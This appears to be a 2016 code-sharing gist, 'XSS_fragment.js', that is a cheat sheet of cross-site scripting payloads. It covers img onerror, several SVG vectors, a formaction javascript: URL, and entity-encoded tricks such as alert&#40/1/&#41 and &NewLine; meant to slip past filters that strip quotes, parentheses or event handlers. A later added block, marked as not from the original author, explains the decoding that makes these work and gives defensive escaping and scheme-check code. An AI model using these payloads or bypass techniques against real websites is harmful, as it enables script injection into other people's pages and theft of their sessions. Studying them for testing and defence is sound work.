a1exlism
7/26/2016 - 8:22 AM

XSS_fragment.js

<img src="1" onerror=location="javascript:alert%281%29">


SVG:
<svg xmlns="http://www.w3.org/2000/svg">
  <g onload="javascript:alert(1)"></g>
</svg>
<svg xmlns="http://www.w3.org/2000/svg">
  <animation xlink:href="javascript:alert(1)"/>
</svg>
<svg xmlns="http://www.w3.org/2000/svg">
  <foreignObject xlink:href="javascript:alert(1)"/>
</svg>
<svg xmlns="http://www.w3.org/2000/svg"> 
  <set attributeName="onmouseover" to="alert(1)"/> 
</svg>
<svg xmlns="http://www.w3.org/2000/svg"> 
  <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler>
</svg>
  
Collected URLs:
  /*
    https://github.com/cure53/H5SC
    http://www.codeceo.com/article/12-funny-xss-vector.html
    http://www.freebuf.com/articles/web/20282.html
    https://jiji262.github.io/wooyun_articles/drops/Bypass xss过滤的测试方法.html
    
    Entity encoding reference: https://dev.w3.org/html5/html-author/charref
  */
No on* event handler:
  <form><button formaction=javascript&colon;alert(1)>CLICKME
= ' " filtered:
  <script>document.write(String.fromCharCode(XSSCode));</script>
= ( ) ; : all filtered at once:
  <svg><script>alert&#40/1/&#41</script>
  |------------------------------------------------|
  |--- Finally know what svg and script together ---|
  |--- feel like: encode however you want, nice  ---|
  |--- (but only HTML encoding is usable here)   ---|
  |------------------------------------------------|
Multi-line bypass:
  <svg /*I am hidden*/onload=alert(1)
Encoding can also be used to bypass further:
  <svg onload=&NewLine;alert(1)
  &NewLine; &#x0000A; &#10; the first one also gets past a regex check for #
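Added example (not part of the original gist, and not the gist author's code): the entity-encoded vectors above (javascript&colon;, alert&#40/1/&#41, &NewLine;alert(1)) get past filters that inspect the raw markup because the browser decodes character references before it ever evaluates the attribute or URL. The snippet below shows the defender's side of that: decode the way the HTML parser will before inspecting an attribute value, and, as the durable fix, encode untrusted data on output instead of blocklisting characters. The payload strings are taken from the notes above; the helper names (decodeEntities, isJavascriptUrl, escapeHtml) and the small named-entity table are my own assumptions, not a browser's full table.

```javascript
// Added example: why entity-encoded attribute values slip past raw-string
// filters, and what a defender does about it. Helper names are hypothetical.

// Named references the notes above rely on (a real browser's table is much
// larger; this is a deliberately small, constructed subset).
const NAMED = { colon: ":", NewLine: "\n", lpar: "(", rpar: ")",
                lt: "<", gt: ">", amp: "&", quot: '"', apos: "'" };

// Decode character references the way they land in an attribute value.
// Numeric references (&#40, &#x0000A;) decode even without the trailing ';',
// which is exactly why a regex looking for "(" or "#...;" misses them.
function decodeEntities(s) {
  return s.replace(/&(#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi,
    (m, _whole, hex, dec, name) => {
      if (hex) return String.fromCodePoint(parseInt(hex, 16));
      if (dec) return String.fromCodePoint(parseInt(dec, 10));
      return name in NAMED ? NAMED[name] : m;   // unknown name: leave as-is
    });
}

// Inspect a URL-valued attribute (href, formaction, xlink:href) after decoding
// and after dropping the ASCII control/whitespace characters the URL parser
// ignores, so the scheme check sees what the browser will see.
function isJavascriptUrl(attrValue) {
  const decoded = decodeEntities(attrValue).replace(/[\u0000-\u0020]/g, "");
  return /^javascript:/i.test(decoded);
}

// The durable fix: encode untrusted text for the HTML context it lands in.
// Text escaped this way can never open a tag or an attribute, so no vector in
// these notes survives it, regardless of which characters a blocklist misses.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Walk the encoded values from the notes plus one ordinary URL (constructed)
// and show what the parser-equivalent view and the scheme check make of them.
function demo() {
  const samples = [
    "javascript&colon;alert(1)",   // formaction value from the notes
    "&NewLine;alert(1)",           // onload value from the notes
    "alert&#40/1/&#41",            // script body from the notes
    "https://example.com/",        // ordinary link (constructed)
  ];
  for (const s of samples) {
    console.log(JSON.stringify(s), "->", JSON.stringify(decodeEntities(s)),
                "| javascript: URL?", isJavascriptUrl(s),
                "| escaped:", escapeHtml(s));
  }
}
demo();
```

Running it prints each value as the browser will decode it next to the scheme-check verdict; the point for a reviewer is that isJavascriptUrl only gives the right answer because it decodes first, while escapeHtml needs no decoding at all because it never lets the data reach the parser as markup.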
USING document.write()
  document.write(prompt(1));  // haven't run into this much before, and haven't tested it either